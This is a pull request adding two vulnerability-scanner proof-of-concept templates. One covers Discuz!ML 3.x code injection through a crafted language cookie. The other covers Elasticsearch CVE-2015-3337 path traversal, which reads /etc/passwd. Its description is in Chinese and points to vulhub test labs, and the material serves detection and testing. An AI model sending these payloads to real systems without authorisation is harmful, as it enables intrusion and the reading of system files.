### PR TITLE
ElasticSearch 目录穿越漏洞（CVE-2015-3337） Discuz!ML 3.x任意代码执行漏洞

### DIFF
--- a/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
+++ b/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-discuz-ml3x-cnvd-2019-22239
 set:
- r1: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: GET
     path: /forum.php
@@ -15,7 +15,6 @@ rules:
     follow_redirects: false
     expression: |
       status == 200 && body.bcontains(bytes(md5(string(r1))))
-      
 detail:
   author: X.Yang
   Discuz_version: Discuz!ML 3.x

--- a/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
+++ b/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
@@ -7,11 +7,11 @@ rules:
     follow_redirects: false
     expression: |
       status==200
-    search: cookiepre = '(?P<token>\S{4})_
+    search: cookiepre = '(?P<token>[\w_]+)'
   - method: GET
     path: /forum.php
     headers:
-      Cookie: "{{token}}_2132_language=sc'.print(md5({{r1}})).'"
+      Cookie: "{{token}}language=sc'.print(md5({{r1}})).'"
     follow_redirects: false
     expression: |
       status == 200 && body.bcontains(bytes(md5(string(r1))))

--- a/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
+++ b/pocs/poc-yaml-discuz-ml3x-cnvd-2019-22239.yml
@@ -1,0 +1,23 @@
+name: poc-yaml-discuz-ml3x-cnvd-2019-22239
+set:
+ r1: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: /forum.php
+    follow_redirects: false
+    expression: |
+      status==200
+    search: cookiepre = '(?P<token>\S{4})_
+  - method: GET
+    path: /forum.php
+    headers:
+      Cookie: "{{token}}_2132_language=sc'.print(md5({{r1}})).'"
+    follow_redirects: false
+    expression: |
+      status == 200 && body.bcontains(bytes(md5(string(r1))))
+      
+detail:
+  author: X.Yang
+  Discuz_version: Discuz!ML 3.x
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239

--- a/pocs/poc-yaml-elasticsearch-cve-2015-3337-lfi.yml
+++ b/pocs/poc-yaml-elasticsearch-cve-2015-3337-lfi.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-elasticsearch-cve-2015-3337-lfi
+rules:
+  - method: GET
+    path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
+    expression: |
+      status==200 && r'root:[x*]:0:0:'.bmatches(body)
+
+detail:
+  author: X.Yang
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337


### PR DESCRIPTION
----------

## 本 poc 是检测什么漏洞的

ElasticSearch 目录穿越漏洞（CVE-2015-3337）
## 测试环境

https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337
## 备注

直接测试即可
